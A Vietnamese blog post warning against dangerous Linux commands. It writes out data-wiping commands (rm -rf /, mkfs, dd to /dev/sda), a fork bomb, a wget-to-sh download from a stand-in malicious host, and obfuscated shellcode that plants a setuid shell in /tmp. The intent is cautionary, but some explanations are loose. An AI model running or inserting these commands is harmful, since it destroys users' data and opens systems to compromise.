Những câu lệnh không nên thử trên máy chủ của bạn

Những câu lệnh không nên thử trên máy chủ của bạn

Trên Linux có những câu lệnh mà chạy 1 lần, hối hận …như thế nào thì tùy tầm quan trọng của máy chủ đó 🙂 Chúng ta cùng tìm hiểu mức độ nguy hiểm của những dòng lệnh đó nhé.

Xóa tất cả mọi thứ

rm -rf /

Lệnh rm -rf / sẽ xóa tất cả mọi thứ trên máy tính Linux của bạn.

Ở câu lệnh trên ta có:

  • rm: lệnh xóa
  • -rf : xóa tất cả file và folder ở đường dẫn được nhập sau đó mà không hỏi ý kiến của bạn.
  • /  đây là đường dẫn thư mục gốc (root), nó chứa tất cả những gì máy tính bạn có.

Ngoài ra còn có một số lệnh nguy hiểm liên quan đến rm -rf như:

  • rm -rf * : Xóa mọi thứ trong thư mục hiện tại.
  • rm -rf . : Xóa thư mục hiện tại và các thư mục con trong đó

Lệnh ẩn của rm -rf

Lệnh rm -rf được ẩn trong đoạn mã dưới đây.

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

Tốt nhất là bạn không nên thực thi nhưng lệnh không rõ nguồn gốc

 :(){ :|: & };:

Dòng lệnh dưới đây nó không xóa hệ thống của bạn nhưng khi thực thi thì hậu quả để lại như một vụ nổ vậy.

:(){ :|: & };:

Nó sẽ liên tục tạo ra các bản sao của chính nó, cho đến khi máy tính của bạn lê lết mới thôi.

Formats ổ cứng

mkfs.ext4 /dev/sda

Đơn giản là:

mkfs.ext4:  Format một hệ thống ext4

/dev/sda : Ổ cứng của bạn.

Thực thi xong bạn sẽ có một ổ cứng hoàn toàn mới đó 🙁

Ghi dữ liệu trực tiếp lên ổ cứng

command > /dev/sda

Command là một lệnh bất kì, khi bạn thực thi nó sẽ ghi kết quả của câu lệnh đó trực tiếp lên ổ cứng của bạn dẫn đến dữ liệu hiện tại bị ghi đè và thay thế bởi những kết quả của câu lệnh “command”

Viết những dữ liệu rác lên ổ cứng

dd if=/dev/random of=/dev/sda

Lệnh trên sẽ xóa sạch dữ liệu trong ổ cứng của bạn và thay thế bằng những dữ liệu rác (junk data). Trong đó:

  • dd: Thực hiện sao chép ở mức độ thấp (low level) từ vị trí này sang vị trí khác.
  • if=/dev/random: Là dữ liệu đầu vào hoặc tương tự như /dev/zero.
  • of=/dev/sda: Là ổ cứng của bạn, nó sẽ sao chép những dữ liệu rác  (junk data) đến ổ cứng làm hư hỏng hoàn toàn dữ liệu của bạn.

Di chuyển Home Directory  đến lỗ đen (blackhole)

mv ~ /dev/null

Di chuyển cái gì đó đến /dev/null có nghĩa là phá hủy nó. /dev/null như là một lỗ đen của hệ thống vì vậy thực hiện lệnh trên đồng nghĩa với di chuyển toàn thư mục Home của bạn đến nơi không thể trở về được

 

Tải và chạy một script

wget http://malicious_source -O- | sh

Lệnh trên sẽ tải về máy một file script và thực hiện script đó bằng lệnh sh. Do vậy tải cái gì đó từ một nguồn không đảm bảo có thể dẫn đến hậu quả khôn lường.
[quangcao1]
 

> file

Lệnh trên dùng để xuất ra nội dung của 1 tập tin. Đơn giản vậy nhưng nếu thực thi 1 lệnh kiểu:

> xxx.conf

thì các tập tin cấu hình của hệ thống sẽ bị ghi đè ngay lập tức.

Trên đây là những lệnh cực kì nguy hiểm trong Linux, nếu bạn muốn thử thì tốt nhất nên tạo máy ảo để thực hành. Đừng thử trên máy của công ty nhé 🙂